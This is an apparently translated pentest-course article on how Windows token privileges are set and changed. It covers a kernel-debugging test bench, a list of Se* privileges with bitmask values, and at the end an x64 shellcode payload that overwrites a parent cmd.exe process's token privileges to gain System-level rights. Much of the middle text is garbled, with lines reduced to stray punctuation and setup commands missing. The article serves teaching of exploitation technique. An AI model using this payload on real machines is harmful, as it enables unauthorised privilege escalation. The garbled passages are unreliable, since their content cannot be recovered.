OTUS expert - Alexander Kolesnikov shared with us a useful article, which he wrote specifically for students of the course "Pentest. Practice of Penetration Testing" .
We, in turn, invite everyone to take part in a free demo lesson on the topic: "Windows AD collection of information, escalation of privileges. Exploits and vulnerabilities of the last 5 years."
The previous article discussed how exploits use the token copy technique to escalate privileges. In this article, we will try to consider another technique for modifying tokens, and also try to find out how the privileges that are placed in the Primary Token are set.
All examples in the article are for informational purposes only, and if you want to repeat the experiments, then use a virtual machine, since some of the actions can damage your working machine. All experiments are performed for research purposes only.
Test bench setup
For experiments, a couple of virtual machines that work over a NAT network are suitable. Two because there is no other way to do kernel debugging of the operating system. And NAT network, so that there are debug symbols, it is easier and faster to search for data without source code. The debugger setting is available on the Internet, but still below there will be a couple of lines as it is done for the Windows 10 1909 operating system.
1. Install the debugger. For the Windows operating system, there is only Windbg Preview, install it:
2. We transfer the target operating system to debug mode:
We reboot the system. And open the second machine, which will contain the debugger:
After rebooting the system:
Windbg Preview , . . .
Token
, , , Primary Token. , Se* . , , :
SeAssignPrimaryToken
SeAudit
SeBackup
SeChangeNotify
SeCreateToken
SeDebug
SeLoadDriver
SeLockMemory
SeManageVolume
SeRestore
SeSecurity
SeTakeOwnership
, , . , “Security Descriptor”:
System. — dx @$cursession.Processes[4].KernelObject.Token
EXFAST_REF , , :
System:
, “Security Descriptor” , . :
, , :
- , BSOD. Windows , Windows 10 1607. , BSOD, “Security Descriptor” . , :
BSOD? , . , :
1. , :
2. cmd.exe
:
3. . :
, . - , - Integrity Levels , .
? . , : 0x1
BSOD , , . , , . , - — 0x100000
.
:
SeDebugPrivilege - 0x100000
SeAuditPrivilege - 0x200000
SeSystemEnvironmentPrivilege - 0x400000
SeCreatePermanentPrivilege - 0x010000
SeSystemtimePrivilege - 0x001000
SeSecurityPrivilege - 0x000100
SeLockMemoryPrivilege - 0x000010
, 6 . , , shellcode, , , . SEPTOKEN_PRIVILEGES _SEPTOKENPRIVILEGES+0x8.
— System , , .
netstat -ab
, . ? . , Windows , System , :
, , payload :
[BITS 64]
start:
mov r9, [gs:0x188] ;KPROCESS/currentThread
mov r9, [r9+0x220] ;EPROCESS KTHREAD
mov r8, [r9+0x3e8] ;InheritedFromUniqueProcessId (cmd.exe PID)
mov rax, r9
loop1:
mov rax, [rax + 0x2f0]
sub rax, 0x2f0 ;KPROCESS
cmp [rax + 0x2e8],r8 ; ProcessId
jne loop1
mov rcx, rax ; PID EPROCESS
add rcx, 0x360
mov rax, [rcx]
and rax, 0xFFFFFFFFFFFFFFF0
mov r8, 0x1e73deff20 ;System
mov [rax+0x48],r8 ;
ret